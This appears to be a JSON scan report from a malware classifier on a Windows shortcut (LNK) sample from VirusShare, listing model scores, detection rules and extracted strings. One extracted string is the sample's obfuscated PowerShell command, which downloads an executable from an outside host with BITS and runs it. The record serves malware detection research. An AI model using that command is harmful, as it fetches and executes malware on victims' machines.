{
  "ml": {
    "v": "4",
    "fs": [
      {
        "id": 0,
        "prob": 0.9961373209953308,
        "class": 1
      }
    ],
    "prob": 0.9961373,
    "class": 1,
    "oprob": 0.98210734,
    "models": [
      {
        "m": "az",
        "prob": 0.98210734,
        "class": 0
      }
    ],
    "oclass": 0,
    "version": "v16.16",
    "thresholds": [
      0.9961373,
      0.9998425
    ],
    "analyzed_at": "2026-05-13T14:57:24Z"
  },
  "path": "VirusShare_8fec83c9da8a6767f2f33af4ce696607",
  "raw": {
    "v": "4",
    "fs": [
      {
        "f": "O(C)Th",
        "x": 140,
        "id": 0,
        "ms": {
          "lnk": {
            "has_arguments": true,
            "has_link_info": false,
            "has_working_dir": false,
            "has_icon_location": true,
            "args_whitespace_total": 4.0,
            "args_max_whitespace_run": 1.0,
            "has_link_target_id_list": true,
            "args_excessive_whitespace": false
          },
          "file": {
            "size": 2066.0
          }
        },
        "ss": [
          [
            0,
            "-c IEX('Start-Bi'+'tsTr'+'ansfer -Sou htt`p://babaq.ga/b/svchostskoq.e`xe C:\\Users\\Public\\quhiy3.e`xe');C:\\Users\\Public\\quhiy3.e"
          ],
          [
            0,
            "C:\\Windows\\system32\\imageres.dll"
          ],
          [
            137,
            "Windows"
          ],
          [
            313,
            "WindowsPowerShell"
          ],
          [
            429,
            "v1.0"
          ],
          [
            507,
            "powershell.exe"
          ],
          [
            1085,
            "%SystemRoot%\\system32\\imageres.dll"
          ]
        ],
        "sz": 2066,
        "ts": [
          {
            "c": 0.800000011920929,
            "d": "LNK contains UTF-16 parent traversal",
            "e": [
              "2E 00 2E 00 5C 00 2E 00 2E 00 5C 00"
            ],
            "i": "micro-behaviors/fs/traversal/parent::lnk-utf16-relative-parent-chain",
            "l": 1
          },
          {
            "a": "T1204.002",
            "c": 0.8999999761581421,
            "d": "LNK has command-line arguments",
            "e": [
              "lnk.has_arguments = 1.00"
            ],
            "i": "objectives/command-and-control/dropper/lnk/target::has-arguments",
            "l": 1
          },
          {
            "a": "T1204.002",
            "c": 0.800000011920929,
            "d": "LNK runs minimized without activation",
            "e": [
              "7"
            ],
            "i": "objectives/command-and-control/dropper/lnk/target::minimized-window",
            "l": 4
          },
          {
            "a": "T1564.003",
            "c": 0.699999988079071,
            "d": "LNK contains powershell.exe target",
            "e": [
              "powershell.exe"
            ],
            "i": "objectives/command-and-control/dropper/lnk/window-hiding::lnk-text-powershell-target",
            "l": 1,
            "m": "F0008"
          },
          {
            "c": 0.8999999761581421,
            "d": "Detects LNK file with suspicious content",
            "e": [
              "$s10"
            ],
            "i": "third_party/SigBase/SUSP/LNK/Suspiciouscommands",
            "l": 5
          }
        ],
        "sha": "2ec83988a15d9a9df404fd682b9dff390cee03c3fa2b3e32f9e8ecbfcd2b3a13",
        "path": "/data/samples/bad/datasets/various/VirusShare/VirusShare_8fec83c9da8a6767f2f33af4ce696607",
        "type": "lnk"
      }
    ],
    "tv": "92e78"
  }
}